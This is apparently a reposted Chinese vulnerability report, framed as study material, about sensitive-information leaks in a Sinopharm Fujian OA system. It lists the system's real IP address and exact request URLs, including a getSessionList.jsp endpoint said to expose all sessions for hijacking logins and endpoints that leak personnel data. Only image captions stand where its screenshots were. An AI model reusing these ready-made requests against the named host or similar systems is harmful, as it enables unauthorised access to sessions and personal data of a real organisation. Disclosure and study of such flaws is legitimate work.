【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露

漏洞细节

多处敏感信息泄露
国药福建OA系统:http://218.5.65.215:8080/yyoa/
session泄露:
http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll

【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露_第1张图片

session劫持登陆:

【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露_第2张图片

http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp

【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露_第3张图片

http://218.5.65.215:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1

【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露_第4张图片

参见:https://bugs.shuimugan.com/bug/view?bug_no=168002

你可能感兴趣的:(【渗透测试实战1】)